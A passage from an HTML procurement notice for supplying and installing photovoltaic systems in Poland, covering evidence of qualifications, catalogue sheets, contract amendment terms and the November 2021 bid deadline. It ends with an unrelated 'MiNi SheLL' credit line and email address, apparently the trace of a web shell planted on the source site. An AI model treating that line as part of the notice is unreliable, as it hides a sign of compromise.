POSTĘPOWANIU:<br/>1) Wykonawcy mogą wykazać się doświadczeniem także wówczas, jeżeli realizowali wymagane<br/>zamówienia w formule robót budowlanych, a nie w formule dostaw z montażem.<br/>2) Wykonawca powinien w wykazie dostaw wyraźnie określić zakres (w tym moc instalacji), aby<br/>można było ustalić, czy spełnia warunek udziału w postępowaniu.<br/>3) Wartości podane w dokumentach w walutach innych niż wskazane przez Zamawiającego<br/>będą przeliczane wg średniego kursu NBP na dzień publikacji ogłoszenia.<br/>4) Przez posiadanie uprawnień budowlanych wymaganych prawem<br/>dla osób uczestniczących w realizacji zamówienia, rozumie<br/>się uprawnienia do wykonywania samodzielnych funkcji<br/>w budownictwie w rozumieniu art. 15a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t. j. Dz.<br/>U. 2020 r, poz. 1333 z późn. zm.) oraz przepisów wcześniejszych. Samodzielne funkcje<br/>techniczne<br/>w budownictwie (nazwy specjalności i ich zakresy) będą rozpatrywane zgodnie z przepisami<br/>regulującymi nadawanie uprawnień budowlanych w dacie ich nadania.<br/>5) Wykonawca w celu wykazania spełniania warunków określonych<br/>w pkt 6.1.4, ppkt 2) SWZ może wskazać osobę będącą obywatelem państwa członkowskiego w rozumieniu art. 4a ust. 1 ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (t.j. Dz. U. z 2019 r. poz. 1117 ), która nabyła kwalifikacje zawodowe<br/>do wykonywania działalności w budownictwie, równoznaczne wykonywaniu samodzielnych<br/>funkcji technicznych w budownictwie<br/>na terytorium Rzeczypospolitej Polskiej – zgodnie z właściwymi przepisami, w szczególności z<br/>ustawą z dnia 22 grudnia 2015 r.<br/>o zasadach uznawania kwalifikacji zawodowych nabytych<br/>w państwach członkowskich Unii Europejskiej (t. j. Dz. U. z 2020 r., poz. 220) oraz ustawą z dnia<br/>15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (Dz.<br/>U. z 2019 r. poz. 1117). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie wymaga złożenia przez Wykonawcę podmiotowych środków dowodowych w tym<br/>zakresie.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie Wykonawcę, którego oferta została najwyżej<br/>oceniona, do złożenia w<br/>wyznaczonym terminie (nie krótszym niż 5 dni od dnia wezwania) następujących podmiotowych<br/>środków dowodowych (aktualnych na dzień złożenia):<br/>W celu potwierdzenia spełniania warunków udziału w postępowaniu:<br/>a) wykazu dostaw wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również<br/>wykonywanych, w okresie ostatnich 5 lat przed terminem składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i<br/>podmiotów, na rzecz których dostawy zostały wykonane lub są wykonywane, oraz załączeniem<br/>dowodów określających, czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym<br/>dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz<br/>którego dostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub<br/>ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub<br/>ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte<br/>wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy przed terminem składania ofert<br/>zgodnie z wzorem stanowiącym Załącznik nr 7 do SWZ – w odniesieniu do warunku określonego w pkt.<br/>6.1.4 ppkt. 1) SWZ,<br/>b) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych<br/>za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na<br/>temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do<br/>wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz<br/>informacją o podstawie<br/>do dysponowania tymi osobami sporządzonego zgodnie<br/>z Załącznikiem Nr 8 do SWZ – w odniesieniu do warunku określonego w pkt. 6.1.4. ppkt. 2) SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający wymaga od Wykonawcy złożenia wraz z ofertą następujących przedmiotowych<br/>środków dowodowych:<br/>a) karty katalogowe oferowanych modułów fotowoltaicznych podpisane przez producenta lub<br/>podmiot uprawniony do reprezentowania producenta<br/>lub dystrybutora urządzeń na rynku polskim obejmujące informacje potwierdzające spełnianie<br/>przez te urządzenia parametrów zawartych<br/>w załączniku Nr 9 do SWZ – „Minimalne parametry urządzeń do potwierdzenia kartami<br/>katalogowymi”, zgodnie z pkt. 1,<br/>b) karty katalogowe oferowanych inwerterów fotowoltaicznych podpisane przez producenta lub<br/>podmiot uprawniony do reprezentowania producenta lub dystrybutora urządzeń na rynku<br/>polskim obejmujące informacje potwierdzające spełnianie przez te urządzenia parametrów<br/>zawartych w załączniku<br/>Nr 9 do SWZ – „Minimalne parametry urządzeń do potwierdzenia kartami katalogowymi”,<br/>zgodnie z pkt. 2,<br/>c) certyfikat potwierdzający pozytywny wynik testów zgodności modułów z normami IEC 61215,<br/>IEC 61730 lub z normami równoważnymi wydany przez jednostkę oceniającą zgodność w<br/>rozumieniu art. 105 ust. 2 ustawy Pzp lub niezależną od wykonawcy jednostkę badawczą<br/>posiadającą akredytację ISO 17025 lub równoważną (fakt posiadania przez jednostkę badawczą<br/>akredytacji ISO 17025 lub równoważnej może wynikać z treści wystawionego dokumentu lub<br/>wykonawca zobowiązany jest to udokumentować odrębnym dokumentem);<br/>W odniesieniu do dokumentów wydanych przez jednostki oceniające zgodność zamawiający<br/>akceptuje odpowiednie przedmiotowe środki dowodowe, inne niż te, o których mowa wyżej, w<br/>szczególności dokumentację techniczną producenta, w przypadku gdy dany wykonawca nie ma<br/>ani dostępu do certyfikatów lub sprawozdań z badań wydanych przez jednostkę oceniająca<br/>zgodność ani możliwości ich uzyskania w odpowiednim terminie, o ile ten brak dostępu nie<br/>może być przypisany danemu Wykonawcy, oraz pod warunkiem, że dany Wykonawca<br/>udowodni, że wykonywane przez niego roboty budowlane, dostawy lub usługi spełniają<br/>wymagania, cechy lub kryteria określone w opisie przedmiotu zamówienia lub kryteriów oceny<br/>ofert, lub wymagania związane z realizacją zamówienia.<br/>W odniesieniu do dokumentów wydanych przez niezależne od wykonawcy jednostki badawcze<br/>posiadające akredytację ISO 17025 lub równoważną zamawiający akceptuje równoważne<br/>przedmiotowe środki dowodowe, jeśli potwierdzają, że oferowane dostawy spełniają określone<br/>przez zamawiającego wymagania. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Zamawiający informuje, że działając na podstawie art. 107 ust. 2 ustawy Pzp przewiduje,<br/>że w sytuacji, w której Wykonawca nie złożył przedmiotowych środków dowodowych lub złożone<br/>przedmiotowe środki dowodowe są niekompletne, Zamawiający jednokrotnie wezwie do ich złożenia lub uzupełnienia w wyznaczonym terminie.<br/>Postanowień pkt 4.8.1 SWZ nie stosuje się, jeżeli pomimo złożenia przedmiotowego środka<br/>dowodowego, oferta podlega odrzuceniu albo zachodzą przesłanki unieważnienia<br/>postępowania.<br/>Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści przedmiotowych<br/>środków dowodowych. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a) oświadczenia o których mowa w pkt. 8.1 SWZ składa z ofertą każdy<br/>z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak<br/>podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim<br/>każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>b) w przypadku, o którym mowa w rozdziale 6.3 SWZ Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia dołączają do oferty oświadczenie,<br/>z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni<br/>Wykonawcy. W przypadku gdy ofertę składa spółka cywilna, a pełen zakres prac wykonają<br/>wspólnicy wspólnie w ramach umowy spółki oświadczenie powinno potwierdzać ten fakt.<br/>Oświadczenie należy złożyć wg wymogów załącznika Nr 6 do SWZ.<br/>c) zobowiązani są oni na wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe, o<br/>których mowa w pkt. 8.3 SWZ, przy czym podmiotowe środki dowodowe, o których mowa w pkt.<br/>8.3.1 SWZ składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/-ą spełnienie<br/>warunku.<br/>Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii<br/>umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Oprócz przypadków, o których mowa w art. 454 i 455 ustawy – Prawo zamówień publicznych i<br/>innych przypadków wskazanych w niniejszej umowie, Zamawiający dopuszcza możliwość<br/>wprowadzania zmiany umowy w stosunku do treści oferty, na podstawie której dokonano wyboru<br/>Wykonawcy.<br/>2. Katalog zmian umowy w zakresie terminu przewidzianego na zakończenie dostaw i montażu<br/>instalacji:<br/>1) zmiany będącej wynikiem zmiany umowy o dofinansowanie projektu zawartej pomiędzy Zamawiającym a Instytucją Współfinansującą w zakresie terminów<br/>(w tym terminu rzeczowej realizacji projektu) lub wysokości i warunków płatności<br/>dofinansowania realizacji projektu stanowiącego przedmiot niniejszej umowy;<br/>2) wystąpienia siły wyższej w rozumieniu § 18 umowy,<br/>3) przedłużenie terminu wykonania umowy o którym mowa w § 2 ust. 1 może nastąpić w<br/>przypadku postoju w wykonaniu świadczenia, wynikającego bezpośrednio z okoliczności<br/>związanych z utrzymywaniem się lub ponownym ogłoszeniem podczas realizacji umowy stanu<br/>epidemii lub stanu zagrożenia epidemiologicznego na terytorium RP o ile okoliczności te mają<br/>bezpośredni wpływ na brak możliwości realizacji zamówienia w umówionym terminie.<br/>Przedłużenie terminu wykonania zamówienia będzie możliwe o czas postoju spełniającego ww.<br/>wymagania który nie może trwać dłużej niż do momentu odwołania stanu epidemii lub<br/>zagrożenia epidemicznego,<br/>4) przedłużenie terminu realizacji zamówienia, o którym mowa w § 2 ust. 1, może nastąpić w<br/>przypadku wystąpienia warunków geologicznych lub hydrologicznych odmiennych od<br/>założonych w dokumentacji projektowej i powodujących konieczność wstrzymania prac lub<br/>konieczność ich wykonania przy wykorzystaniu odmiennych od zaprojektowanych rozwiązań<br/>technicznych, przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni<br/>niezbędną do wyeliminowania utrudnień związanych z ich wystąpieniem,<br/>5) przedłużenie terminu wykonania umowy o którym mowa w § 2 ust. 1 może nastąpić z powodu<br/>działań osób trzecich uniemożliwiających wykonanie zamówienia pod warunkiem, że działania te<br/>nie są konsekwencją działań którejkolwiek ze Stron niniejszej Umowy.<br/>3. Zmiana sposobu spełnienia świadczenia jest dopuszczalna w przypadku wystąpienia niżej<br/>wymienionych okoliczności:<br/>1) zmiany w zakresie doboru poszczególnych urządzeń wchodzących w skład zestawu instalacji<br/>wynikające z błędów w dokumentacji wykonanej przez uprawnione podmioty niemożliwej do<br/>stwierdzenia przy założeniu dochowania należytej staranności Zamawiającego;<br/>2) niezależnych od Wykonawcy przeszkód uniemożliwiających terminową dostawę wskazanych<br/>w ofercie produktów w szczególności w przypadku zakończenia ich produkcji lub niedostępności<br/>ich na rynku w momencie realizowania dostaw – pod warunkiem, że Wykonawca dochował<br/>należytej staranności i w momencie uzyskania zamówienia wykonał odpowiednie czynności w<br/>celu ich zamówienia. W przypadku opisanym w zdaniu poprzedzającym Wykonawca może<br/>dostarczyć i zamontować inne urządzenia (urządzenia zastępcze), które spełniają wymogi<br/>opisane w SWZ i załącznikach pod warunkiem wykazania przez wykonawcę zgodności tych<br/>urządzeń w wymogami zamawiającego oraz przedstawienia dla urządzeń zastępczych<br/>wszystkich dokumentów wymaganych w postępowaniu o udzieleniu zamówienia publicznego i<br/>niniejszej umowie. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-05 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia lub wycofania oferty dostępnego na ePUAP i udostępnionego również na miniPortalu. Sposób złożenia oferty opisany został w Instrukcji użytkownika dostępnej na miniPortal.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-05 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-04</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia:<br/>-Pozostałe rodzaje zmian spowodowane następującymi okolicznościami:<br/>1) zmiana osób, przy pomocy których Wykonawca i Zamawiający realizuje przedmiot umowy na<br/>inne spełniające warunki określone w SWZ;<br/>2) siła wyższa w rozumieniu § 18 umowy uniemożliwiająca wykonanie przedmiotu umowy<br/>zgodnie z SWZ;<br/>3) zmiana obowiązującej stawki VAT;<br/>4) zmiana sposobu rozliczenia umowy lub dokonywania płatności na rzecz Wykonawcy na<br/>skutek zmian zawartej przez zamawiającego umowy<br/>o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu.<br/>5) zmiana podwykonawcy w trakcie realizacji umowy.<br/>6) zmiana zasad płatności. Jeżeli przed zakończeniem realizacji zamówienia Zamawiający<br/>otrzyma indywidualną interpretację podatkową (lub interpretacje dotyczące innych płatników ale<br/>wydane w identycznym stanie faktycznym) dotyczącą podatku od umów zawartych na podstawie<br/>niniejszego postępowania, która wskaże na konieczność zastosowania innej stawki podatku<br/>VAT niż wynikający oferty i umowy, Zamawiający przewiduje możliwość zmiany umowy z<br/>Wykonawcą na podstawie art. 455 ust. 1 pkt 1 ustawy polegającą na zmianie stawki podatku<br/>VAT - do tych części zamówienia, do których będzie to uzasadnione w świetle otrzymanej<br/>interpretacji indywidualnej (stała zostaje kwota netto, Wykonawca wystawi faktury z właściwym<br/>podatkiem VAT).<br/>7) zmiana stawki VAT w przypadku zmiany lokalizacji/miejsca montażu instalacji, powodującej<br/>zmianę stawki podatku VAT,<br/>8) wszelkie zmiany, które będą konieczne do zagwarantowania zgodności umowy z<br/>wchodzącymi w życie po terminie składania ofert przepisami o podatku od towarów i usług w<br/>zakresie wynikającym z tych przepisów,<br/>-O zmianach wskazanych w ust. 3 pkt 1 Zamawiający powiadomi Wykonawcę na minimum 15<br/>dni przed dniem, na który zaplanowano montaż instalacji.<br/>-Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może<br/>wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.<br/>-Nie stanowi zmiany istotnej umowy w rozumieniu art. 454 ustawy Prawo zamówień publicznych:<br/>1) zmiana danych teleadresowych,<br/>2) zmiana danych związanych z obsługą administracyjno-organizacyjną Umowy<br/>(np. zmiana nr rachunku bankowego);<br/>-Strona, która występuje z propozycją zmiany umowy, w oparciu o przedstawiony powyżej<br/>katalog zmian umowy zobowiązana jest do sporządzenia i uzasadnienia wniosku o taką zmianę.<br/>Wszelkie zmiany umowy dla swej ważności wymagają formy pisemnej w postaci aneksu do<br/>umowy.

Creat By MiNi SheLL
Email: jattceo@gmail.com